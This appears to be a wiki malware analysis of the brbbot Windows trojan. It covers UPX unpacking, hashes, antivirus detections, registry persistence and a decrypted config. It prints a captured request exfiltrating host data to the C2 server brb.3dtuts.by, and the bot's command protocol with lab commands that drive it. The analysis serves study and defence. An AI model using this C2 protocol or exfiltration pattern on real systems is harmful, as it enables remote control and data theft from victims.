72922cab21d75a9e2da351bda35bdd9f

From aldeid
Jump to: navigation, search

Description

Summary

  • The malware is packed with UPX
  • It accepts commands from the attacker, passed through HTTP requests
  • The malware exfiltrates the IP address (i paramater), the hostname (c parameter) and the list of running processes (p parameter, as encrypted string)
  • It creates the brbbot persistence registry key in HKLM\microsoft\software\windows\currentversion\run
  • It uses a XOR-crypted (key: 5b) configuration file (brbconfig.tmp) that contains the list of commands, the XOR key and the sleep time (the malware attempts to connect every 30 seconds)
  • The malware connects to brb.3dtuts.by/ads.php (HTTP)

Packer

The sections analysis shows that 2 sections are named with "UPX":

Name       VirtAddr     VirtSize     RawSize      Entropy     
--------------------------------------------------------------------------------
UPX0       0x1000       0x6000       0x0          0.000000    [SUSPICIOUS]
UPX1       0x7000       0x3000       0x2400       7.690743    [SUSPICIOUS]
.rsrc      0xa000       0x1000       0x400        2.149480    

PEiD indicates that the malware is packed with UPX:

Brbbot-peid-upx.png

The malware is packed with UPX. To unpack, simply issue:

$ upx -d brbbot.exe -o brbbot-unpacked.exe
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2013
UPX 3.09        Markus Oberhumer, Laszlo Molnar & John Reiser   Feb 18th 2013

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     18944 <-     11264   59.46%    win32/pe     brbbot-unpacked.exe

Unpacked 1 file.

Identification

Packed Unpacked
MD5 72922cab21d75a9e2da351bda35bdd9f a0d53f1fa1e22b5c74089432bab4494d
SHA1 4000047c2e6065ec8aa08370cec7df1da4e9bf6d db6f12a63c1e7b65f040c86013de63fab1ccd2d3
SHA256 0531af652bb42b26f2473ef9472378b4145d2147031a18bb0e243a8f6febb6a5 c0617b2b37cf5e7bea96b8a1ded724c825898c7cdac35742676d01b7921d6727
ssdeep 192:+aKvC0lTUO6hab8kfobhAv/eF6dujaNIkipYaqtbMTz:LClIl0bbobh4/U61ubqtQH 192:+73aYKb1sXCTy0zTHzMLiREr0aPdQNbomE2Ez8+1I+p6TdpobxlnnaexxqnUdCF:oOy0zT24aPIboBjLs2HaeTdCFjO
imphash 7524196cc2153be544d1a0ebb10ef7e3 87c70a2e7a7535e011e6d5e6412ce6e5
File size 11.0 KB ( 11264 bytes ) 18.5 KB ( 18944 bytes )
File type Win32 EXE Win32 EXE
Magic literal PE32 executable for MS Windows (GUI) Intel 80386 32-bit PE32 executable for MS Windows (GUI) Intel 80386 32-bit

Antivirus detection

Antivirus Detection (packed) Detection (unpacked) Update
AVG Win32/DH{IANnDwo} Win32/DH{IANnDwo} 20140219
Ad-Aware DeepScan:Generic.Malware.SFdld!.26C47596 Gen:[email protected] 20140219
AhnLab-V3 Downloader/Win32.Spnr 20140219
AntiVir TR/Sisron.A.2120 HEUR/Malware 20140219
Avast Win32:Trojan-gen Win32:Malware-gen 20140219
BitDefender DeepScan:Generic.Malware.SFdld!.26C47596 Gen:[email protected] 20140219
Commtouch W32/Trojan-Dlr-SysWrt-based!Max W32/GenBl.A0D53F1F!Olympus 20140219
Comodo UnclassifiedMalware UnclassifiedMalware 20140219
DrWeb DLOADER.Trojan DLOADER.Trojan 20140219
ESET-NOD32 probably unknown NewHeur_PE probably unknown NewHeur_PE 20140219
Emsisoft DeepScan:Generic.Malware.SFdld!.26C47596 (B) Gen:[email protected] (B) 20140219
F-Prot W32/Trojan-Dlr-SysWrt-based!Max W32/Trojan-Dlr-SysWrt-based!Max 20140219
F-Secure DeepScan:Generic.Malware.SFdld!.26C47596 Gen:[email protected] 20140219
Fortinet NewHeur_PE NewHeur_PE 20140219
GData DeepScan:Generic.Malware.SFdld!.26C47596 Gen:[email protected] 20140219
Ikarus Win32.SuspectCrc Trojan.Win32.Spy 20140219
K7AntiVirus Virus ( 4602580b0 ) Riskware ( b70d20c90 ) 20140219
K7GW Riskware ( 0015e4f01 ) Riskware ( 0015e4f01 ) 20140219
Kingsoft Win32.Troj.Generic.a.(kcloud) Win32.Troj.Undef.(kcloud) 20140219
McAfee Artemis!72922CAB21D7 Artemis!A0D53F1FA1E2 20140219
McAfee-GW-Edition Artemis!72922CAB21D7 Artemis!A0D53F1FA1E2 20140219
MicroWorld-eScan DeepScan:Generic.Malware.SFdld!.26C47596 Gen:[email protected] 20140219
Microsoft Trojan:Win32/Sisron 20140219
NANO-Antivirus Trojan.Win32.Heuristic119!.bcyvqd Trojan.Win32.Heuristic119!.bcyvqd 20140219
Norman Horst.gen32 Troj_Generic.FFROT 20140219
Panda Trj/CI.A Trj/CI.A 20140219
Sophos Mal/Generic-S Mal/Generic-S 20140219
Symantec Downloader Trojan.Gen 20140219
TheHacker Posible_Worm32 20140219
TrendMicro TROJ_SPNR.15L712 TROJ_SPNR.15L712 20140219
TrendMicro-HouseCall TROJ_GEN.RCBOHK9 TROJ_SPNR.15L712 20140219
VIPRE Trojan.Win32.Generic!BT Trojan.Win32.Generic!BT 20140219
Agnitum 20140219
Antiy-AVL Trojan/Win32.SGeneric 20140219
Baidu-International 20140219
Bkav 20140219
ByteHero 20140219
CAT-QuickHeal 20140213
CMC 20140219
ClamAV 20140219
Jiangmin 20140219
Kaspersky 20140219
Malwarebytes 20140219
Qihoo-360 20140218
Rising 20140219
SUPERAntiSpyware 20140218
TotalDefense 20140219
VBA32 20140219
ViRobot 20140219
nProtect 20140219

Dynamic Analysis

Network indicators

Contacted domains

The domain brb.3dtuts.by is contacted

HTTP requests

GET /ads.php?i=192.168.102.129&c=MALWARE-418EE9F&p=123f373e600822282f3e366028362828753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e233e6037283a2828753e233e602d363a382f33372b753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e603e232b3734293e29753e233e60282b343437282d753e233e602d362f343437283f753e233e60362836283c28753e233e60292e353f37376869753e233e60312a28753e233e60282a37283e292d29753e233e602d362f343437283f753e233e602c2e3a2e38372f753e233e602c36322b292d283e753e233e600f0b1a2e2f3418343535082d38753e233e602c2838352f3d22753e233e600f0b1a2e2f34183435353e382f753e233e603a373c753e233e602c36322b292d283e753e233e6038363f753e233e60183a2b2f2e293e191a0f753e233e6039293939342f753e233e HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Host: brb.3dtuts.by
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: thttpd/2.25b 29dec2003
Content-Type: text/plain; charset=iso-8859-1
Date: Wed, 19 Feb 2014 18:01:06 GMT
Last-Modified: Sat, 01 Feb 2014 09:24:44 GMT
Accept-Ranges: bytes
Connection: close
Content-Length: 5

tixe

This request shows that the malware is attempting to exfiltrate details about the infected system, including:

Parameter Description Value
i IP address of the infected system 192.168.102.129
c Hostnamed of the infected system MALWARE-418EE9F
p Decoded payload}}) 123f373e600822282[SNIP]42f753e233e

Registry keys

The following key is created:

Path HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\brbbot
Type REG_SZ
Name brbbot
Value C:\WINDOWS\system32\brbbot.exe

Files

A file is created: brbconfig.tmp. (see {{#switchtablink:Decoded_file|Decoded file}})

$ hd brbconfig.tmp 
00000000  b8 9c c3 aa df 98 67 11  66 ab fe 23 79 07 6e 17  |......g.f..#y.n.|
00000010  f3 b7 44 7c dd 2a fa 30  79 56 4c 75 a2 76 71 7d  |..D|.*.0yVLu.vq}|
00000020  72 91 3a 1a da 02 8e 81  e3 27 3c c2 36 7c c0 48  |r.:......'<.6|.H|
00000030  a0 17 ed dc 01 44 2d 95  2c 1d 12 3c 88 bf ce 2d  |.....D-.,..<...-|
00000040  6b c0 61 16 46 b5 0c 16  92                       |k.a.F....|
00000049

Issuing commands

List of commands

From the "{{#switchtablink:Decoded_file|decoded file}}" analysis, we gathered following possible commands:

Command Description
exec=cexe Execute a command
file=elif Upload or download a file?
conf=fnoc Update configuration file?
exit=tixe Exit the malware

We also know that the malware is gathering commands from the ads.php script every 30 seconds (sleep=30000).

cexe (exec)

As a proof of concept, I've set up a lab with PyminifakeDNS (fakedns) running and a HTTP server as follows:

[email protected]:/var/www# echo "cexe c:\windows\system32\calc.exe" > ads.php

After a short while, the infected machine opens a new instance of the Windows calculator every 30 seconds:

Brbbot-poc-calc.png

tixe (exit)

Now, the tixe parameter is confirmed to kill the malware on the infected machine:

[email protected]:/var/www# echo "tixe" > ads.php

Brbbot-poc-exit.png

Static analysis

Strings

%02x
%s?i=%s&c=%s&p=%s
brbconfig.tmp
YnJiYm90
brbbot
Software\Microsoft\Windows\CurrentVersion\Run
CONFIG
encode
sleep
exit
conf
file
exec
Microsoft Enhanced Cryptographic Provider v1.0
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Connection: close
HTTP/1.1
POST
ntdll.dll
ZwQuerySystemInformation
('8PW
700PP
```hhh
xppwpp
FCC;
WjPRW
WWWW
\SVWjD^3
ItRIt
QSSSSSS
xt	;
@PVWSh
SVW3
ShPS
QQSVW
[email protected];P
YY;E
]QQj
$SVh
PSSh
tT9u
[email protected]
jD_W
PSSSSSS
URPQQh
L$,3
UVWS
[_^]
SVWj
_^[]
8csm
8csm
_^[]
Y__^[
t?!E
v	N+D$
UQPXY]Y[
KERNEL32.DLL
ADVAPI32.dll
msvcrt.dll
USER32.dll
WININET.dll
WS2_32.dll
HeapAlloc
GetProcessHeap
HeapFree
GetLastError
HeapReAlloc
GetComputerNameA
CreateProcessA
SetEvent
DeleteFileA
MoveFileExA
CopyFileA
GetSystemDirectoryA
GetSystemWow64DirectoryA
GetModuleFileNameA
GetModuleHandleA
WaitForSingleObject
CreateEventA
CloseHandle
WriteFile
CreateFileA
LockResource
LoadResource
SizeofResource
FindResourceA
ReadFile
GetFileSize
GetTempFileNameA
GetTempPathA
WideCharToMultiByte
GetProcAddress
UnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
GetSystemTimeAsFileTime
GetCurrentProcessId
GetCurrentThreadId
GetTickCount
QueryPerformanceCounter
SetUnhandledExceptionFilter
RtlUnwind
InterlockedCompareExchange
Sleep
InterlockedExchange
RegCloseKey
RegFlushKey
RegSetValueExA
RegOpenKeyExA
RegDeleteValueA
CryptReleaseContext
CryptDestroyKey
CryptDestroyHash
CryptEncrypt
CryptDeriveKey
CryptHashData
CryptCreateHash
CryptAcquireContextA
CryptDecrypt
_amsg_exit
__setusermatherr
__p__commode
__p__fmode
__set_app_type
[email protected]@YAXXZ
_controlfp
_initterm
exit
_XcptFilter
_exit
strrchr
__getmainargs
strstr
strncat
memcpy
strchr
strncmp
strncpy
memset
sscanf
sprintf
atoi
_cexit
GetDC
HttpSendRequestA
HttpQueryInfoA
InternetOpenA
InternetSetOptionA
InternetConnectA
InternetCloseHandle
InternetQueryDataAvailable
InternetReadFile
HttpOpenRequestA
#3#or%5452o#8A
kU'9
HMXB
?Zd;
?/L[
S;uD
z?aUY
D?$?
U>c{
zc%C1
.:3q
-64OS
NKeb
0yVLu
vq}r

IAT

ADVAPI32

  • RegCloseKey
  • RegFlushKey
  • RegSetValueExA
  • RegOpenKeyExA
  • RegDeleteValueA
  • CryptReleaseContext
  • CryptDestroyKey
  • CryptDestroyHash
  • CryptEncrypt
  • CryptDeriveKey
  • CryptHashData
  • CryptCreateHash
  • CryptAcquireContextA
  • CryptDecrypt

KERNEL32

  • HeapAlloc
  • GetProcessHeap
  • HeapFree
  • GetLastError
  • HeapReAlloc
  • GetComputerNameA
  • CreateProcessA
  • SetEvent
  • DeleteFileA
  • MoveFileExA
  • CopyFileA
  • GetSystemDirectoryA
  • GetSystemWow64DirectoryA
  • GetModuleFileNameA
  • GetModuleHandleA
  • WaitForSingleObject
  • CreateEventA
  • CloseHandle
  • WriteFile
  • CreateFileA
  • LockResource
  • LoadResource
  • SizeofResource
  • FindResourceA
  • ReadFile
  • GetFileSize
  • GetTempFileNameA
  • GetTempPathA
  • WideCharToMultiByte
  • GetProcAddress
  • UnhandledExceptionFilter
  • GetCurrentProcess
  • TerminateProcess
  • GetSystemTimeAsFileTime
  • GetCurrentProcessId
  • GetCurrentThreadId
  • GetTickCount
  • QueryPerformanceCounter
  • SetUnhandledExceptionFilter
  • RtlUnwind
  • InterlockedCompareExchange
  • Sleep
  • InterlockedExchange

USER32

  • GetDC

WININET

  • HttpSendRequestA
  • HttpQueryInfoA
  • InternetOpenA
  • InternetSetOptionA
  • InternetConnectA
  • InternetCloseHandle
  • InternetQueryDataAvailable
  • InternetReadFile
  • HttpOpenRequestA

WS2_32

  • WSACleanup
  • gethostname
  • gethostbyname
  • inet_ntoa
  • WSAStartup

msvcrt

  • _amsg_exit
  • __setusermatherr
  • __p__commode
  • __p__fmode
  • __set_app_type
  • [email protected]@YAXXZ
  • _controlfp
  • _initterm
  • exit
  • _XcptFilter
  • _exit
  • strrchr
  • __getmainargs
  • strstr
  • strncat
  • memcpy
  • strchr
  • strncmp
  • strncpy
  • memset
  • sscanf
  • sprintf
  • atoi
  • _cexit

Decoded file

To decode the file, let's load our unpacked malware into OllyDbg and set a breakpoint to the ReadFile function. The one on the below screenshot corresponds to the access to the brbconfig.tmp file as shown by the handles window:

Brbbot-readfile-handles-brbconfig.png

A few intstructions after, there is an access to the CryptDecrypt function:

Brbbot-decoded-001.png

Setting a brekpoint at this address and then stepping over reveals the following string:

uri=ads.php;exec=cexe;file=elif;conf=fnoc;exit=tixe;encode=5b;sleep=30000

It corresponds to the brbconfig.tmp file decrypted. It provides us with the following parameters:

  • uri=ads.php
  • exec=cexe
  • file=elif
  • conf=fnoc
  • exit=tixe
  • encode=5b
  • sleep=30000

Decoding HTTP payload

From the previous "{{#switchtablink:Decoded_file|decoded file}}" analysis, we have gathered the following information: encode=5b

We can suppose that 5b is the decoding key for the string discovered in the p parameter of the HTTP request. Let's try with translate.py:

$ cat encoded.hex
123f373e600822282f3e366028362828753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e233e6037283a2828753e233e602d363a382f33372b753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e603e232b3734293e29753e233e60282b343437282d753e233e602d362f343437283f753e233e60362836283c28753e233e60292e353f37376869753e233e60312a28753e233e60282a37283e292d29753e233e602d362f343437283f753e233e602c2e3a2e38372f753e233e602c36322b292d283e753e233e600f0b1a2e2f3418343535082d38753e233e602c2838352f3d22753e233e600f0b1a2e2f34183435353e382f753e233e603a373c753e233e602c36322b292d283e753e233e6038363f753e233e60183a2b2f2e293e191a0f753e233e6039293939342f753e233e
$ xxd -r -p encoded.hex > encoded.raw
$ translate.py encoded.raw decoded.txt 'byte ^ 0x5b'
$ more decoded.txt Idle;System;smss.exe;csrss.exe;winlogon.exe;services.exe;lsass.exe;vmacthlp.exe;svchost.exe;svchost.exe;svchost.exe;svchost.exe;svchost.exe;explorer.exe;spoolsv.exe;vmtoolsd.exe;msmsgs.exe;rundll32.exe;jqs.exe;sqlservr.exe;vmtoolsd.exe;wuauclt.exe;wmiprvse.exe;TPAutoConnSvc.exe;wscntfy.exe;TPAutoConnect.exe;alg.exe;wmiprvse.exe;cmd.exe;CaptureBAT.exe

We can see from the above output that the list of running processes is disclosed.


Comments

blog comments powered by Disqus